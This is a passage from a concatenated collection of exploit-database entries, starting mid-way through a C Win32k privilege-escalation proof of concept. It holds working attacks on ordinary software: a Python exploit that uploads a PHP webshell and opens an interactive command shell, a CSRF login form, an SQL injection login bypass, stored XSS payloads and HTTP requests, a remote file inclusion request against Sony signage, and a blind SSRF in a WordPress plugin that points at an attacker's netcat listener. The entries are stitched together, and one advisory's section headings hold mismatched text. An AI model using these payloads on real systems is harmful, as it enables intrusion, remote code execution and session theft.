OrgCCI2 = (PFNUSER32CALLBACK)InterlockedExchangePointer((PVOID*)pCCI2,
&NewCCI2);
PVOID pCCI3 = &((PVOID*)peb->KernelCallbackTable)[3];
if (!VirtualProtect(pCCI3, sizeof(PVOID), PAGE_EXECUTE_READWRITE, &OldProtect))
return 0;
OrgCCI3 = (PFNUSER32CALLBACK)InterlockedExchangePointer((PVOID*)pCCI3,
&NewCCI3);
hParent = CreateWindow(L"ScrollBar", L"Parent", WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT, CW_USEDEFAULT, 10, 10, NULL, NULL, NULL, NULL);
hChild = CreateWindow(L"ScrollBar", L"Child", WS_OVERLAPPEDWINDOW |
WS_VISIBLE, CW_USEDEFAULT, CW_USEDEFAULT, 10, 10, NULL, 0, NULL,
NULL);
Flag1 = TRUE;
SendMessage(hChild, WM_LBUTTONDOWN, 0, 0);
return 0;
}
[Vendor]
Microsoft
[Vulnerability Type]
Privilege Escalation
[Description]
The entry creation date may reflect when the CVE ID was allocated or
reserved, and does not necessarily indicate when this vulnerability
was discovered, shared with the affected vendor, publicly disclosed,
or updated in CVE.
- - - more: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0642
[Disclosure Timeline]
An elevation of privilege vulnerability exists in Windows when the
Win32k component fails to properly handle objects in memory. An
attacker who successfully exploited this vulnerability could run
arbitrary code in kernel mode. An attacker could then install
programs; view, change, or delete data; or create new accounts with
full user rights.
To exploit this vulnerability, an attacker would first have to log on
to the system. An attacker could then run a specially crafted
application that could exploit the vulnerability and take control of
an affected system.
The update addresses this vulnerability by correcting how Win32k
handles objects in memory.
[+] Disclaimer
The entry creation date may reflect when the CVE ID was allocated or
reserved, and does not necessarily indicate when this vulnerability
was discovered, shared with the affected vendor, publicly disclosed,
or updated in CVE.
# Exploit Title: User Registration & Login and User Management System 2.1 - Cross Site Request Forgery
# Exploit Author: Dipak Panchal(th3.d1p4k)
# Vendor Homepage: https://phpgurukul.com
# Software Link: http://user-registration-login-and-user-management-system-with-admin-panel
# Version: 5
# Tested on Windows 10
Attack Vector:
An attacker can craft HTML page containing POST information to have the
victim sign into an attacker's account, where the victim can add
information assuming he/she is logged into the correct account, where in
reality, the victim is signed into the attacker's account where the changes
are visible to the attacker.
Exploit:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/loginsystem/" method="POST">
<input type="hidden" name="uemail" value="user1@mail.com" />
<input type="hidden" name="password" value="User@1234" />
<input type="hidden" name="login" value="LOG IN" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Mitigation:
Please add a csrf token to login request or make some type prompt that the
session has ended when the new login from attacker occurs.
# Exploit Title: Coastercms 5.8.18 - Stored XSS
# Exploit Author: Hardik Solanki
# Vendor Homepage: https://www.coastercms.org/
# Software Link: https://www.coastercms.org/
# Version: 5.8.18
# Tested on Windows 10
XSS IMPACT:
1: Steal the cookie
2: User redirection to a malicious website
Vulnerable Parameters: Edit Page tab
Steps to reproduce:
1: Navigate to "http://localhost/admin/login" and log in with
admin credentials.
2:- Then after login navigates to "Page --> Homepage --> Our Blog" and
click on the edit page.
3: Then add the payload "<script>alert(123)</script>" & Payload
"<h1>test</h1>", and cliock on update button. Saved succesfully.
4: Now, click on "View live page" and it will redirect you to the live page
at "http://localhost/homepage/blog" and XSS will get stored and
trigger on the main home page
# Exploit Title: EgavilanMedia Address Book 1.0 Exploit - SQLi Auth Bypass
# Date: 02-12-2020
# Exploit Author: Mayur Parmar(th3cyb3rc0p)
# Vendor Homepage: http://egavilanmedia.com
# Software Link : http://egavilanmedia.com/egm-address-book/
# Version: 1.0
# Tested on: PopOS
Attack Vector:
An attacker can gain admin panel access using malicious sql injection queries.
Steps to reproduce:
1. Open admin login page using following URl:
-> http://localhost/Address%20Book/login.php
2. Now put below Payload in both the fields( User ID & Password)
Payload: admin' or '1'='1
3. Server accepted our payload and we bypassed cpanel without any
credentials
# Exploit Title: Online Matrimonial Project 1.0 - Authenticated Remote Code Execution
# Exploit Author: Valerio Alessandroni
# Date: 2020-10-07
# Vendor Homepage: https://projectworlds.in/
# Software Link: https://projectworlds.in/free-projects/php-projects/online-matrimonial-project-in-php/
# Source Link: https://github.com/projectworldsofficial/online-matrimonial-project-in-php
# Version: 1.0
# Tested On: Server Linux Ubuntu 18.04, Apache2
# Version: Python 2.x
# Impact: Code Execution
# Affected components: Affected move_uploaded_file() function in functions.php file.
# Software: Marital - Online Matrimonial Project In PHP version 1.0 suffers from a File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file.
# Attack vector: An authenticated (you can register a user for free) not privileged user is able to upload arbitrary file in the upload form used to send profile pics, if the file is a PHP script, it can be executed.
#
# Additional information:
#
# To exploit this vulnerability:
# 1) register a not privileged user at /register.php
# 2) login in the application /login.php
# 3) keep note of the redirect with the GET 'id' parameter /userhome.php?id=[ID]
# 4) go to the page /photouploader.php?id=[ID]
# 5) upload an arbitrary file in the upload form, in my example, I used a file called shell.php with the content of "<?php system($_GET['cmd']); ?>"
# 6) An error will occurr, but the file is correctly uploaded at /profile/[ID]/shell.php
# 7) run command system command through /profile/[ID]/shell.php?cmd=[COMMAND]
#
# How to use it:
# python exploit.py [URL] [USERNAME] [PASSWORD]
import requests, sys, urllib, re, time
from colorama import Fore, Back, Style
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
def webshell(SERVER_URL, ID, FILE_NAME):
try:
print(Fore.YELLOW+'[+] '+Fore.RESET+'Connecting to webshell...')
time.sleep(1)
WEB_SHELL = SERVER_URL+'profile/'+ID+'/'+FILE_NAME
getCMD = {'cmd': 'echo ciao'}
r2 = requests.get(WEB_SHELL, params=getCMD)
status = r2.status_code
if status != 200:
print(Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL)
r2.raise_for_status()
print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.')
while True:
inputCMD = raw_input('$ ')
command = {'cmd': inputCMD}
r2 = requests.get(WEB_SHELL, params=command, verify=False)
print r2.text
except:
print("\r\nExiting.")
sys.exit(-1)
def printHeader():
print(Fore.GREEN+"___ ___ _ _ _ "+Fore.RED+" ______ _____ _____")
print(Fore.GREEN+"| \/ | (_)| | | |"+Fore.RED+" | ___ \/ __ \| ___|")
print(Fore.GREEN+"| . . | __ _ _ __ _ | |_ __ _ | |"+Fore.RED+" | |_/ /| / \/| |__ ")
print(Fore.GREEN+"| |\/| | / _` || '__|| || __|/ _` || |"+Fore.RED+" | / | | | __| ")
print(Fore.GREEN+"| | | || (_| || | | || |_| (_| || |"+Fore.RED+" | |\ \ | \__/\| |___ ")
print(Fore.GREEN+"\_| |_/ \__,_||_| |_| \__|\__,_||_|"+Fore.RED+" \_| \_| \____/\____/ ")
print ''
if __name__ == "__main__":
printHeader()
if len(sys.argv) != 4:
print (Fore.YELLOW+'[+] '+Fore.RESET+"Usage:\t python %s [URL] [USERNAME] [PASSWORD]" % sys.argv[0])
print (Fore.YELLOW+'[+] '+Fore.RESET+"Example:\t python %s https://192.168.1.1:443/marital/ Thomas password1234" % sys.argv[0])
sys.exit(-1)
SERVER_URL = sys.argv[1]
SERVER_URI = SERVER_URL + 'auth/auth.php'
LOGIN_PARAMS = {'user': '1'}
LOGIN_DATA = {'username': sys.argv[2], 'password': sys.argv[3], 'op': 'Log in'}
req = requests.post(SERVER_URI, params=LOGIN_PARAMS, data=LOGIN_DATA, verify=False)
print(Fore.YELLOW+'[+] '+Fore.RESET+'logging...')
time.sleep(1)
for resp in req.history:
COOKIES = resp.cookies.get_dict()
SPLITTED = resp.headers["location"].split("=")
ID = SPLITTED[1]
print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully retrieved user [ID].')
time.sleep(1)
SERVER_URI = SERVER_URL + 'photouploader.php'
LOGIN_PARAMS = {'id': ID}
LOGIN_DATA = {'username': sys.argv[2], 'password': sys.argv[3], 'op': 'Log in'}
FILE_NAME = 'shell.php'
FILES = {'pic1': (FILE_NAME, '<?php system($_GET[\'cmd\']); ?>'), 'pic2': ('', ''), 'pic3': ('', ''), 'pic4': ('', '')}
req = requests.post(SERVER_URI, params=LOGIN_PARAMS, files=FILES, cookies=COOKIES, verify=False)
print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully uploaded.')
time.sleep(1)
webshell(SERVER_URL, ID, FILE_NAME)
# Exploit Title: Sony BRAVIA Digital Signage 1.7.8 - System API Information Disclosure
# Date: 20.09.2020
# Exploit Author: LiquidWorm
# Vendor Homepage: https://pro-bravia.sony.net
# Version: 1.7.8
Sony BRAVIA Digital Signage 1.7.8 System API Information Disclosure
Vendor: Sony Electronics Inc.
Product web page: https://pro-bravia.sony.net
https://pro-bravia.sony.net/resources/software/bravia-signage/
https://pro.sony/ue_US/products/display-software
Affected version: <=1.7.8
Summary: Sony's BRAVIA Signage is an application to deliver
video and still images to Pro BRAVIAs and manage the information
via a network. Features include management of displays, power
schedule management, content playlists, scheduled delivery
management, content interrupt, and more. This cost-effective
digital signage management solution is ideal for presenting
attractive, informative visual content in retail spaces and
hotel reception areas, visitor attractions, educational and
corporate environments.
Desc: The application is vulnerable to sensitive information
disclosure vulnerability. An unauthenticated attacker can
visit several API endpoints and disclose information running
on the device.
Tested on: Microsoft Windows Server 2012 R2
Ubuntu
NodeJS
Express
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2020-5610
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5610.php
20.09.2020
--
$ curl http://192.168.1.20:8080/api/system
{"__v":0,"_id":"5fa1d6ed9446da0b002d678f","version":"1.7.8","contentsServer":{"url":"http://192.168.1.21/joxy/"},"networkInterfaces":{"lo":[{"address":"127.0.0.1","netmask":"255.0.0.0","family":"IPv4","mac":"00:00:00:00:00:00","internal":true}],"eth0":[{"address":"192.168.1.20","netmask":"255.255.255.0","family":"IPv4","mac":"ZE:R0:SC:13:NC:30","internal":false}]},"serverTime":"2020-12-01T20:13:41.069+01:00","os":"Synology","hostIp":"192.168.1.21"}
# Exploit Title: Sony BRAVIA Digital Signage 1.7.8 - Unauthenticated Remote File Inclusion
# Date: 20.09.2020
# Exploit Author: LiquidWorm
# Vendor Homepage: https://pro-bravia.sony.net
# Version: 1.7.8
Sony BRAVIA Digital Signage 1.7.8 Unauthenticated Remote File Inclusion
Vendor: Sony Electronics Inc.
Product web page: https://pro-bravia.sony.net
https://pro-bravia.sony.net/resources/software/bravia-signage/
https://pro.sony/ue_US/products/display-software
Affected version: <=1.7.8
Summary: Sony's BRAVIA Signage is an application to deliver
video and still images to Pro BRAVIAs and manage the information
via a network. Features include management of displays, power
schedule management, content playlists, scheduled delivery
management, content interrupt, and more. This cost-effective
digital signage management solution is ideal for presenting
attractive, informative visual content in retail spaces and
hotel reception areas, visitor attractions, educational and
corporate environments.
Desc: BRAVIA digital signage is vulnerable to a remote file
inclusion (RFI) vulnerability by including arbitrary client-side
dynamic scripts (JavaScript, VBScript, HTML) when adding content
though the input URL material of type html. This allows hijacking
the current session of the user, execute cross-site scripting code
or changing the look of the page and content modification on current
display.
Tested on: Microsoft Windows Server 2012 R2
Ubuntu
NodeJS
Express
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2020-5612
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5612.php
20.09.2020
--
Request:
--------
POST /api/content-creation?type=create&id=174ace2f9371b4 HTTP/1.1
Host: 192.168.1.20:8080
Proxy-Connection: keep-alive
Content-Length: 468
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.1.20:8080
Referer: http://192.168.1.20:8080/test.txt
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: io=RslVZVH6Dc8WsOn5AAAJ
{"material":[{"name":"http://www.zeroscience.mk/pentest/XSS.svg","type":"html"},{"name":"C:\\fakepath\\Blank.jpg","type":"jpeg"},{"name":"","type":"external_input"},{"name":"","type":""}],"layout":{"name":"assets/images/c4e7e66e.icon_layout_pattern_landscape_003.png","area":3,"direction":"landscape","layouts":[{"index":1,"width":960,"height":1080,"x":0,"y":0},{"index":2,"width":960,"height":540,"x":960,"y":0},{"index":3,"width":960,"height":540,"x":960,"y":540}]}}
# Exploit Title: mojoPortal forums 2.7.0.0 - 'Title' Persistent Cross-Site Scripting
# Date: 3-12-2020
# Exploit Author: Sagar Banwa
# Vendor Homepage: https://mojoportal.com
# Software Link: https://www.mojoportal.com/download
# Version: 2.7.0.0
# Tested on: Windows 10/Kali Linux
Attack vector:
This vulnerability can results attacker to inject the XSS payload in Add Forum title section and each time admin visits the View Detail of Forum section from admin panel, the XSS triggers and attacker can able to steal the cookie according to the crafted payload.
Vulnerable Parameters: Edit Forum 'Title :'.
Steps-To-Reproduce:
1. Login to the Admin Account
2. Go to the Forums.
3. click on Add Forum.
4. Add payload to Title: <script>alert(1)</script>
5. Click on Create New Forum.
6. As soon as admin or any visitor visit the forum the XSS payload will triage.
Post Request -
'''
POST /Forums/EditForum.aspx?mid=1275&pageid=756 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://localhost/Forums/EditForum.aspx?mid=1275&pageid=756
Content-Type: application/x-www-form-urlencoded
Content-Length: 5037
Origin: https://localhost
Connection: close
Cookie: ASP.NET_SessionId=[removed]; _ga=GA1.2.1772464100.1606932969; _gid=GA1.2.1379348562.1606932969; returnurl25=https://localhost/; .mojochangeme=7ECC859CF4455C5CAE01964464A1029D676213BFF565B38E31D6AE3CF45C212B26FEF4451D2565510EFC1FBEE1A0002322CB05C272CFF74A5F2BDD798286542EA2BC30A889ABDC6D74502865A66DECF250F715A55C510F2DFDBCA1865D3DF436DA579221; localhostportalroles25=3119B16DC158DE7032105189AE61DB79F7043A498D422DABE9485B15E18E299E5C3B1C0696B736560172F2435276EF79EBF5D93A714F285B6EAEB16B648CB2EA4C7AE691B25D00EF4AD168393EFB423ED302A355C340B5D11AA9C7F44BDA6767678C3212BAA3B2991B38D1971836A62C0A1E2EF7AA36FE5DFE1BDAFF077F785F74B360520BA5793271671755790ED2BB9E98199A; fwAdminDrawer=close; _gat=1
Upgrade-Insecure-Requests: 1
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATEFIELDCOUNT=7&__VIEWSTATE=8GbpJWPoYrikzpEsM5g5Oyxg%2Fw3otQN%2Bp%2FxL2%2BIM8Cb0gFtj%2BUt4LWZm2SnDpq2wFeoZ5CxcLmEwnfTYfX3zUCO8ullGYZmsvrRPgkCmd4Q8Ziuu9bC6xpnpvd3zY2u2%2FmkVsmTINB4RJfAFk%2FM2RGngO7YcBtMIdKm1B0Mca3Lzwk9SbGZ%2BrkzOKF%2FMw%2Fev0rDciq1cZ2EfgKa6cfHhN9Rdo1CK3u%2FaGhGTXDMq4kgcV8VmtKYzMd60hoYTtdj%2B6xVyW2kJ0W6uYuzNZy4ctGRethu2TDkK%2Bp3Jt69X2iL07JQmXYFL4Nouh%2FF5nR3dDnhT50x%2F7ezT%2BRKLpwnBPrqE2XRgsR9eCwyV59d6NIxNos6fD3rYmhRgONXeinpuRxe8AFElCPOnFXJz7nhtBNkUx9xl2jx95l6CS7wE8wQtFQc5PWUlJ7r1junVJ5oUmFhLEjDXn7qJ%2Fn9kBHDzTjYI7Epq%2Fo8uS9FRO0PeNyQLqUlRW5Ig&__VIEWSTATE1=xhUOYE%2FB05kVdGbeLy9qSX0k5X6mJ0pwbklHcDgNHAdlV6yKobnEZLVzA11ZLSVTDLlg1anxthz4S3MKQLjEcxWd8EbQ6TFFyuR4Ey6ZQlHXc4YXVzaRdBe8XPsfbZrh6fqBJab90XjGQZoAMeE3mDqXVKo7oeA5YpZn4bfBHNxj8el8vs%2B5QbAD5INtXMzVMLrtoNxHRlPjtn7u2LiRHXS7mal7GPJ2RD48rh1sEBkohr91gAxGBLdl3H3rT%2Fo1ACtQU8sNRceeV1XhgEbjPyweu6L2FPtyWxyQXma76osWfXkftyt3dloWIywM201r3ByGOAxR%2BtpFpj3IwIoyEJvvUnJ3UcteS6DiG2QqebBaVAl%2B4NzTAhMOg3%2FX%2Fa5%2BZC8lZ71yf8U5GF58DcCEI36PvnQOlKlKuO2CsO0iOTXf8UYirVNV%2F6qqgwru0P5HhCulGGM%2BTrUswOWEZYkMzoyjeRwt54PUOKaAllJrYBy4UwYjs7Ma&__VIEWSTATE2=ME%2FnWlF9Jj7LFvrQ3J6B24%2FZAdATYRBm7MuM%2FZQ%2B2ft4PF%2BONy1JWKH%2F46T%2BS9ni%2FjOnj8TN9ACNlJlfGkhfmhXBCBaLpf5o2h58ucOACihtCaSmjixiv%2B1SM7DKYp3l3SRp0DrHZWLy9bHZIV1qFNOyudHvIMHy8mYC5dlH5vvFVcDC%2BZeAbCbOeYVBLlnKXatlNf3x91urPZhemx35uzEied9Tk7w8W3o5W5W5a9vWLrBkEg4Mhm5IHx0qTn9LHLP5dNi6EQnM%2B%2FE1%2FRcJoZq1%2BkjhBOPGx1M7EVg%2BnXzJLy1%2BnXEf5D64P6pS8HdNtxQOtLgP4RC9YFWzkMhRI%2B9B71cPQfRHKAJCB3idIBtvQ7OhmArPbsq0pOvmfOF7c3dsy0NyY8KtVTlGaL1km5H1Q2SZdn1yMmnaeGlOgoioPM7fSZ8u%2BE%2BtQkvuPY5afsnt1H%2BUmGBGbiZZZR1%2BR%2FkvUANhzOHnLfuXcloItlRnvpKF0gIW&__VIEWSTATE3=VG3JlCj%2FguoAhsgsZxvtFo51ac%2FZob3zGU3iuvj56w2XljOxYhJ25EqC%2BaJjbgyCCSgF%2FIUQ8XIdHtIOBKvDhyv%2BWhlPdttXTOzBKk9EW6swSmZN9TNVL32jDq5suMPMrh9SsNj7b62O0ycjpCeVPRGfCThjWYxu0GwFiy%2Fnd65fr6BUCiaoTliKw%2Bvnh3IMw0CQSu5VdL0Y4h2R5hiomNKkcfqjFN%2BXtj9UrXNqOS13QZ9TP1NLf0Q2CXQ%2FjZvwSM9koJlEZ3Z2xfvOo4VXU92ONV%2FuBg3ugFTpw9NcEVnU5C5HDDQdQJpYqrUpRpIOaDru80pqBz90shkebGCRnbbeSAaZb%2FpcBsSNnmpftBSftR0nZYMX3VAAJaxjyehbtfLsmbHPuCdzyLOsqMPaFClG00yAR%2BbmuKIv2veSZ6GBGQjM14jrRoWgqZmF711tfCIfEDYErBz5%2BGC%2F4xz8gv44z%2BSF8VKk4s5dOCKZo1YZQ7yFqSYD&__VIEWSTATE4=z%2FvLRzX2nqqUfDd9UEeZG%2Bowmey7SmdvonndNsjZWX35cB4FiARHvWJhnHIoJEY2%2BJB6bFM8628%2B35cnidhq5iboc6dhqAo%2Fl9VbFfp4rxq%2BGh%2Bw%2Fu%2BNiyai3o6LWuy5cWxRnAMrlNhErHm86uVj1HTosQbBDhd0PU7yVTS2dEtfi3GggBfVDFn2eLh4sr6iSkN85RPhENouvNKl6PmHhhaFl4poe6etmjh63vYipPoY1VvYz2h%2BDisT5lEo7NYOhchYv%2FIQPuGkPBjkdTqtqourBuYw0pzLGRA1zf8X0UgwWnJVT8RLaf3Bp0uatXoatA%2FIo5j1Lggxm9cM2GFH7%2FrYDwAyPgWF%2BtLgqQUpnZoQoeIh62uPykr3p5pKsWXpKdtz4IINfyH%2BE0CH2gj96zVM76zFHdYt59%2Bs%2BZgu5i%2Bzf3icKJWlZaJiLzfEpSwIQijjvzC5CxwEAoO1LfnupW%2FZFWt%2FwsDXOZl2tgAunHfXe4sv4YHu&__VIEWSTATE5=8E0NZMBOC6vc%2Fm%2F%2FPv1X3U9D8PHM%2F60zTW2Fgz%2FDdau3xuxrxCd6EkTpHliKnJld0hjuEnMan6KZGs3sy59qTLc%2FOAU5Y%2Bg4FtWPugB%2B8faI4wtWGpLlR%2F2%2FhVyIer702HqYaZe2YtmG3FzYsEP5iNdWBIVAHG%2B285uMPcrARf7t7RNbnVLYe2hR4g6rm%2B3cz7Xlvl0hW1gtdYBLtD4x8eGpNWXsrZEdc9jjsRgDfd12VsDVZeIYxA5llNAQYyLLcv1czlYtLC2rT2cay3LZ3bCz5KvNOiNQNc4PjL5bXBFGlz9BCztmCHaxWXkhytsFQJOND2HqK6ZcBSsXFur9XKjdhkVbLJUGY6hd9zlqurehbzaS9qJFe2g1DTCuJeN39qqcjJk3ev3TOQbu9Q2RX2VEFF8Mdd8WFRdaJ7JJN5kzkmVgtcjmrhHZjpsZEGVYmL0A3HbXukjVBb8kHoOA1MzUagoa6kwmCNfNCmGgbKKZVSm90HF5&__VIEWSTATE6=O%2BS12LR2Z4oVhKLtpr07dZf4n4xaCnf%2BvWZpBROiixTdpBGO4Eg3J%2B2UqaWIrBm2FJjY%2B2NAG6EiGHDpYEzCuBEHQQg3RzT0co%2F0MXY0Vp%2FvhG5voMgkx24Zixl3Z2RcJ7GFNDyF2hDwZmEhmR8d5Xeh%2FlkLsGc4vHL7SAXLwg5lSPgLb8wTEPDv2WkOChlXK%2BKAUm5v6N4o3dv9j9fztlHsS%2FFXHM1HvYfH%2BX5UPFAfvCkiiK6iXbrQsvVRVX9KBvWmMdBLC4FHSX8BO6qy2U8d2TaJIG2YfewgUHkGWMEvhqFqsTyetatA&__VIEWSTATEGENERATOR=28F0A2BA&__EVENTVALIDATION=MhCP0%2FosgOAGG9hof6m2uvCclDI3J3ur9418exWCyHZn20PSWqlYEBB584LM%2Fwt7LEIk5phX%2F%2FnqL9ZAiCGAwuqvm%2FS9%2FjvzaXlbQf9H0qlhD30h7hKVA1zy%2FQB1rQh8Nbmh3tjczNLrHj%2BY%2FlybGM%2BEyN%2BelhoN8Q%2FOykCziCKgbY9tDeDf4S%2FWsjzOoEGyOpijMEyEq0ikBrY26gO4X0GeiV6Yw6LvTHt5PL%2FNElgUT%2BCw%2B0loxrz5QgIKuKqozFkU08iSXgsVrNJKUFD%2FJaUPeaDRiNUjYsMQq5qXop%2F1%2B3lUT1XDP1MelFUveIeo4AxsnA%2FhoiB48O69ScQY0J6WTvQo%2B%2FpY6Cn4Din2x5QvSigzwCJtqI3F%2BSWxlZzYSeJCq1uQlw2lboNaJhOoDSDTUG3cO3Oy18WG6PHcKbZHgq%2BPDJq6RvXq50a9Z36J4lnFpQmRofOaSpXR7e0uoBo6VYatMOcu3uWC6WKq6%2F8I0G88OKDIXdU8mQyTr%2B4IfZ2tAwNkfhQQyOOPOQKjJOPGOYnH14ozP58d7PNrMbUQKCwyimsUbox5uLQclzM5wK4x1mV9FqA9PZOy1Q9ApKyLotkAJbTdVmBkDQ1ZKOUd9GOBgg%2BAOuVokVGF8qCF4NYZjBZjpfW0OmihSu%2BXiONqPoa6K5483r8tF0%2F5Hch2K4XggkPqA%2B%2FVmfHr%2BkwKb7RUbQ%3D%3D&ctl00%24mainContent%24txtTitle=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&ctl00%24mainContent%24edContentinnerEditor=&ctl00%24mainContent%24txtSortOrder=100&ctl00%24mainContent%24txtPostsPerPage=10&ctl00%24mainContent%24txtThreadsPerPage=40&ctl00%24mainContent%24allowedPostRoles%24ctl00%242=Authenticated+Users&ctl00%24mainContent%24txtModeratorNotifyEmail=&ctl00%24mainContent%24chkIncludeInGoogleMap=on&ctl00%24mainContent%24btnUpdate=Create+New+Forum&ctl00%24mainContent%24hdnReturnUrl=https%3A%2F%2Flocalhost%2Fforums
'''
# Exploit Title: Invision Community 4.5.4 - 'Field Name' Stored Cross-Site Scripting
# Date: 02-12-2020
# Exploit Author: Hemant Patidar (HemantSolo)
# Vendor Homepage: https://invisioncommunity.com/
# Software Link: https://invisioncommunity.com/buy
# Version: 4.5.4
# Tested on: Windows 10/Kali Linux
# CVE: CVE-2020-29477
Vulnerable Parameters: Profile - Field Name.
Steps-To-Reproduce:
1. Go to the Invision Community admin page.
2. Now go to the Members - MEMBER SETTINGS - Profiles.
3. Now click on Add Profile field.
4. Put the below payload in Field Name:
"<script>alert(123)</script>"
5. Now click on Save button.
6. The XSS will be triggered.
POST /admin/?app=core&module=membersettings&controller=profiles&tab=profilefields&subnode=1&do=form&parent=3&ajaxValidate=1 HTTP/1.1
Host: 127.0.0.1
Connection: close
Content-Length: 660
Accept: */*
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://127.0.0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://127.0.0.1/admin/?app=core&module=membersettings&controller=profiles
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6
Cookie: XYZ
form_new_activeTab=&form_new_submitted=1&csrfKey=3ffc7a5774ddc0d2a7142d2072191efc&MAX_FILE_SIZE=20971520&pf_title%5B1%5D=%3Cscript%3Ealert(123)%3C%2Fscript%3E&pf_desc%5B1%5D=Test&pf_group_id=3&pf_type=Text&pf_allow_attachments=0&pf_allow_attachments_checkbox=1&pf_content%5B0%5D=&pf_multiple=0&pf_max_input=0&pf_input_format=&pf_member_edit=0&pf_member_edit_checkbox=1&radio_pf_member_hide__empty=1&pf_member_hide=all&radio_pf_topic_hide__empty=1&pf_topic_hide=hide&pf_search_type=loose&pf_search_type_on_off=exact&radio_pf_profile_format__empty=1&pf_profile_format=default&pf_profile_format_custom=&radio_pf_format__empty=1&pf_format=default&pf_format_custom=
# Exploit Title: Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)
# Date: 03/12/2020
# Exploit Author: Pankaj Verma (_p4nk4j)
# Vendor Homepage: https://www.canto.com/integrations/wordpress/
# Software Link: https://github.com/CantoDAM/Canto-Wordpress-Plugin
# Version: 1.3.0
# Tested on: Ubuntu 18.04
# CVE: CVE-2020-28976, CVE-2020-28977, CVE-2020-28978
Description:-
The Canto plugin 1.3.0 for WordPress contains Blind SSRF Vulnerabilities.
It allows an unauthenticated attacker to make a request to any Internal and External Server via "subdomain" parameter.
Vulnerable Parameters and Endpoints:-
https://target/wp-content/plugins/canto/includes/lib/detail.php?subdomain=
https://target/wp-content/plugins/canto/includes/lib/get.php?subdomain=
https://target/wp-content/plugins/canto/includes/lib/tree.php?subdomain=
Steps To Reproduce:-
1. Start a Netcat Listener on any port For e.g. 4499
2. Navigate to "<wordpress_server>/wp-content/plugins/canto/includes/lib/detail.php?subdomain="
3. Add the Attacker's IP and Port For e.g. "172.17.0.1:4499?" to "subdomain=" parameter.
4. Observe the response we got from the Target on Attacker's Listener.
Note:- Using "?" in the payload is mandatory as it acts as a bypass to conduct this attack.